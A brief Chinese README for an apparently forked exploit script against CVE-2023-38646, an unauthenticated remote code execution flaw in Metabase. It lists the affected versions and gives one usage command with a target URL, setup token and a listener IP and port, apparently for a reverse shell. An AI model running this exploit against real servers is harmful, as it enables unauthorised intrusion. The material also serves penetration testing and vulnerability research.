从 kh4sh3i 复刻而来,去除了对 Burp Collector 的依赖。
CVE-2023-38646(Metabase 无预认证远程代码执行漏洞):
Metabase 开源版本 0.46.6.1 之前以及 Metabase Enterprise 1.46.6.1 之前的版本允许攻击者以服务器权限级别在服务器上执行任意命令。利用该漏洞无需认证。
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
更多信息请阅读这篇文章。